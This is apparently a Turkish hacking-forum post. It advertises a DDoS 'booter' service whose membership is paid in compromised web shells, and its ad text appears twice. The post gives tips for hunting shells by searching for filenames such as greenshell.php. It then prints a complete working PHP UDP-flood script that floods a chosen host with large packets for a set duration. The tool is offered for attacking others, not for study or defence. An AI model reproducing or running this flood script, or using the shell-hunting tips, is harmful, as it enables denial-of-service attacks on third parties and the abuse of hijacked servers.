SenioR
Spys-Z
Sa Beyler Uzun Zamandan Beri Aklımda Olan Bir Poje Bu
Artık Herkes DDOS saldırısı Yapabilcek
Ajanlar Booter
Üye Olabilmek İçin Yapmanız Gereken Tek Şey Shell Kasmak Çünki Booter SunucularI Kullanarak Attack Yapıyor
Shelll Bulmak için Size bi kaç Tavsiyede Bulunabilirim
Öncelikle Kendinize Bi, Shell Checker Bulmanız Gerek Sonra Google ve Bing De shell arayabilirsniz
greenshell.php
draw.php
green.php
Araştırarak Daha Fazla Shell İsmi Bulabilirsniz
[/color]1 HAFTALIK ÜYELİK = 20 SHELL
Artık Herkes DDOS saldırısı Yapabilcek
Ajanlar Booter
Üye Olabilmek İçin Yapmanız Gereken Tek Şey Shell Kasmak Çünki Booter SunucularI Kullanarak Attack Yapıyor
Shelll Bulmak için Size bi kaç Tavsiyede Bulunabilirim
Öncelikle Kendinize Bi, Shell Checker Bulmanız Gerek Sonra Google ve Bing De shell arayabilirsniz
greenshell.php
draw.php
green.php
Araştırarak Daha Fazla Shell İsmi Bulabilirsniz
[/color]1 HAFTALIK ÜYELİK = 20 SHELL
Kod:
#---------------------------------------------------------------# # Powered By r0b0t's # # By r0b0t's # # wWw.xrobot.mobi # # V01 # # r-b0t's # # 03/2011 # ---------------------------------------------------------------# <html> <head> r0b0t Dd0s Php V.01 </head> <body> <center> <font color="00FF00"> <STYLE> input{ background-color: #000000; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666; } button{ background-color: #000000; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666; } body { background-color: #000000; } </style> <?php //UDP if(isset($_GET['host'])&&isset($_GET['time'])){ $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('d-m-y h:i:s')."<br>"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65553;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65553); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n"; echo '<br><br> <form action="'.$surl.'" method=GET> <input type="hidden" name="xrt" value="php"> Host: <br><input type=text name=host><br> Length (seconds): <br><input type=text name=time><br> <input type=submit value=Go></form>'; }else{ echo '<br><b>UDP Flooding</b><br> <form action=? method=GET> <input type="hidden" name="xrt" value="php"> Host: <br><input type=text name=host value=><br> Length (seconds): <br><input type=text name=time value=><br><br> <input type=submit value=Go></form>'; } ?> </center> </body> </html> - See more at: http://www.exploit-id.com/dospoc/php-ddos-r0b0ts-udp-flooding-v0-1#sthash.d3s50Ta0.dpuf